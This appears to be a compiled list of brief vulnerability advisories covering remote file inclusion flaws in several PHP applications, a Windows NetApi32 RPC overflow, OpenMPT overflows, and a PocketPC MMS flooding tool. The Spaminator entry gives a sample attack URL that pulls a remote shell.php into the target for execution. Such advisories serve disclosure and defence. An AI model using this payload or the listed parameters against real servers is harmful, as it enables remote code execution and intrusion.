Thatware 0.4.6 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a URL in the root_path parameter that points to a malicious file hosted on a remote server. This malicious file can be executed on the vulnerable server, allowing the attacker to gain access to the server.
Spaminator 1.7. is vulnerable to a remote file include vulnerability. The vulnerable code is located in the /src/Login.php page, where the variable $page is declared and then included in the code. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable server, such as http://server/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?. This will allow the attacker to execute arbitrary code on the vulnerable server.
Multiple Remote File Inclusion vulnerabilities exist in PhpwCMS 1.2.6. The vulnerable code is located in the include/inc_ext/spaw/dialogs/table.php, include/inc_ext/spaw/dialogs/a.php, include/inc_ext/spaw/dialogs/colorpicker.php, include/inc_ext/spaw/dialogs/confirm.php, include/inc_ext/spaw/dialogs/img.php, include/inc_ext/spaw/dialogs/img_library.php, and include/inc_ext/spaw/dialogs/td.php files. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable server. The URL contains the malicious file which will be included in the vulnerable page. This can lead to remote code execution.
This module exploits a stack overflow in the NetApi32 NetpIsRemote() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on on Windows XP SP0 and SP1, and will result in code execution on Windows 2000 SP4 and Windows XP SP2.
The root_path and GLOBALS["root_path"] variables are not sanitized, allowing attackers to include malicious files. An example exploit is provided in the text, which uses a command.txt file to execute arbitrary commands on the vulnerable system.
OpenMPT <= 1.17.02.43 and SVN <= 157 are vulnerable to stack and heap overflows. Attack 1 is a global buffer overflow in ReadITProject (*.ITP) and Attack 2 is a heap overflow in ReadSample (*.AMF). Both of these attacks can be triggered by creating a malicious file and sending it to the vulnerable application.
A vulnerability in TinyWebGallery v1.5 allows remote attackers to include arbitrary files via a URL in the image parameter to examples/image.php or examples/image.php2.
Tagger v3 is vulnerable to a remote file inclusion vulnerability due to a lack of sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to execute arbitrary code on the vulnerable system.
NotiFlood is a PoC MMS M-notification.ind flooder written to demo the PocketPC MMS Composer vulnerabilities. The tool sends MMS new message notifications to the target PocketPC device over WiFi IP:UDP4:2948. In flood mode the device plays the new message sound for every received notification. If auto receive is enabled the phone will try to dial-up GPRS in order to receive the message. After receiving a couple hundred messages the phone randomly freezes or rejects new messages. Further the MMS inbox is filled up with messages that only can be deleted manually one-by-one. In crash mode, each notification crashes the MMS client and therefore actively keeps the user from using the Inbox application while connected to WiFi (the Inbox application also handles email like via POP3 and IMAP).
See-Commerce is prone to a remote file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. The attacker can supply a URL in the 'path' parameter to execute arbitrary code. Successful exploitation requires that 'register_globals' is enabled.
Services By CQR